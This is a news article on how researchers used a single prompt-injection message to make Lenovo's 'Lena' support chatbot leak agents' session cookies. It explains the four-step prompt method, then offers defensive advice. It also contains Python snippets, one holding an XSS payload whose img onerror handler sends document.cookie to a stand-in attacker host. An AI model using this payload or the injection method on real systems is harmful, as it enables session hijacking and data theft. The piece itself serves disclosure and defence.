Lenovo’s Customer Service AI Chatbot Got Tricked Into Revealing Sensitive Information. Here’s How.

A single 400-character prompt exposed an almighty flaw in Lenovo’s AI assistant


Published: August 20, 2025

Rhys Fisher

Lenovo is the latest high-profile brand to have a security flaw exposed in its AI customer service chatbot.

Indeed, security researchers at Cybernews probed Lenovo’s ChatGPT-powered customer service assistant, Lena, with jaw-dropping results.

Their investigation found that Lena can be tricked into giving up sensitive company information.

Cybernews researchers were able to uncover a flaw that allowed them to hijack live session cookies from customer support agents.

With a stolen support agent cookie, an attacker could slip into the support system without any login details, access live chats, and potentially dig through past conversations and data.

And all it took was a single, 400-character prompt.

In discussing the investigation, the Cybernews researchers highlighted the relative ease with which AI chatbots can be duped:

“Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new.

“What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”

The news comes soon after CX Today reported on how a different team of researchers cracked open a replica of McKinsey & Co.’s customer service bot, getting it to spit out entire CRM records.

Unpacking the Flaw

First, it should be noted that while Cybernews did uncover a flaw in Lenovo’s system, there is nothing to suggest that bad actors have accessed any customer data.

Cybernews reported the flaw to Lenovo, which confirmed the issue and moved quickly to secure its systems.

But how exactly were the Cybernews researchers able to dupe Lena?

The researchers have revealed that the prompt used contained the following four key elements:

  • Innocent opener: The attack begins with a straightforward product query, like asking for the specs of a Lenovo IdeaPad.
  • Hidden format switch: The prompt then nudges the bot into answering in HTML (alongside JSON and plain text), a format the server is primed to act on.
  • The payload: Buried in the HTML is a bogus image link that, when it fails to load, pushes the browser to contact an attacker’s server and leak session cookies (a rough sketch of this payload class follows the list).
  • The push: To seal it, the prompt insists the bot must show the image, framing it as vital to the user’s decision-making.
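
To make those four steps more concrete, here is a rough sketch of the class of payload the researchers describe. It is not the exact prompt or markup used against Lena; the attacker domain, broken image path, and error handler are hypothetical stand-ins.

```python
# Illustrative only: a normal-looking product answer with a booby-trapped
# image tag buried inside it. If the support console renders this HTML
# verbatim, the broken image fails to load, the onerror handler fires, and
# the browser sends the page's cookies to a server the attacker controls.
# The domain, path, and parameter name below are hypothetical.

INNOCENT_PART = "<p>Here are the Lenovo IdeaPad specs you asked for.</p>"

PAYLOAD_PART = (
    '<img src="/definitely-missing.png" '
    "onerror=\"fetch('https://attacker.example/collect?c=' + document.cookie)\">"
)

# What the chatbot is coaxed into returning as its "answer".
bot_reply_html = INNOCENT_PART + PAYLOAD_PART
print(bot_reply_html)
```

The point is not the specific markup but the trust boundary: the moment a browser or server treats model output as live HTML rather than untrusted text, a prompt becomes an attack vector.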

Worryingly, Zenity revealed earlier this month that 3,500 public-facing AI agents remain vulnerable to similar prompt injection attacks.

How to Prevent Your Chatbot from Becoming a Liability

Lenovo’s Lena case is a wake-up call for any company leaning on AI for customer support.

The core problem isn’t just a single flawed implementation; chatbots, by design, are eager to please. And when that eagerness meets poorly vetted inputs, things can go sideways fast.

Indeed, Lenovo is far from the first major organization to experience chatbot troubles.

The challenges aren’t limited to security flaws, either. AI chatbots have a long history of hallucinating and dispensing wrong or misleading advice.

Take New York City’s “MyCity” small-business assistant as an example. In April 2024, it misrepresented city policies and even suggested illegal actions to users.

Similarly, Air Canada found itself before a tribunal over its chatbot’s inaccurate guidance, with the ruling forcing the airline to honor advice that was plainly wrong.

Other errors have verged on the absurd. For instance, DPD’s GenAI chatbot was coaxed into swearing and composing a poem mocking the company.

These incidents underline just how unreliable chatbots can be.

For businesses, the question isn’t if an AI will make mistakes; it’s how prepared you are to contain the fallout when it does.

While the ever-evolving nature of AI-powered technology makes a definitive guide to preventing chatbot errors impossible, the following steps will go a long way toward shoring up your defenses:

  • Harden input and output checks: Never trust what comes in or goes out. Sanitize all user inputs and chatbot responses, and block execution of unverified code. It’s a simple step that could have prevented the session-cookie flaw in Lena (see the sketch after this list).
  • Verify AI outputs before acting on them: Web servers shouldn’t automatically treat chatbot outputs as actionable instructions. As is evident, blind trust can open the door to attacks.
  • Limit session privileges: Not every bot interaction needs full agent-level access. Segregating privileges reduces the impact if a token or cookie is compromised.
  • Monitor for anomalies: Keep an eye on unusual access patterns or unexpected requests. Early detection is often the only thing stopping small flaws from becoming major breaches.
  • Test aggressively and continuously: Regularly simulate prompt-injection attacks or other AI-specific exploits. Proactive testing beats reactive firefighting every time.
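
As a concrete starting point for the first two items, the sketch below shows one way a backend might treat a Lena-style reply as untrusted text before it reaches an agent’s browser. The helper names, allowlist, and logging here are assumptions for illustration; they do not describe Lenovo’s actual fix, and a production system would lean on a maintained HTML sanitizer rather than hand-rolled checks.

```python
# A minimal sketch of "harden input and output checks" and "verify AI outputs
# before acting on them". Everything here (function names, the allowlist) is
# illustrative, not a description of Lenovo's implementation.

import html
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.lenovo.com", "support.lenovo.com"}  # hypothetical allowlist
URL_PATTERN = re.compile(r"""https?://[^\s"'<>]+""")


def references_unknown_hosts(bot_reply: str) -> bool:
    """Flag replies that would point a browser at hosts outside the allowlist."""
    for url in URL_PATTERN.findall(bot_reply):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_HOSTS:
            return True
    return False


def prepare_for_display(bot_reply: str) -> str:
    """Treat model output as untrusted text, never as live markup.

    html.escape turns tags such as <img onerror=...> into inert text, so even
    a successful prompt injection cannot make the agent's browser call out to
    an attacker's server.
    """
    if references_unknown_hosts(bot_reply):
        # In a real deployment: log the event and alert security monitoring.
        print("suspicious chatbot output detected")
    return html.escape(bot_reply)


if __name__ == "__main__":
    hostile = '<img src="/missing.png" onerror="fetch(\'https://attacker.example/c?\' + document.cookie)">'
    print(prepare_for_display(hostile))  # printed as harmless escaped text, not rendered HTML
```

Escaping by default keeps the payload described earlier from ever executing, while the allowlist check mainly surfaces attempts so that anomaly monitoring (the fourth item above) has something to alert on.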

Ultimately, while chatbots can boost efficiency and CX, they can only truly be relied upon if businesses pair them with strong security hygiene.

As all of the above examples have demonstrated, even big brands can overlook the basics – and in the world of AI, small oversights can escalate fast.

 

 
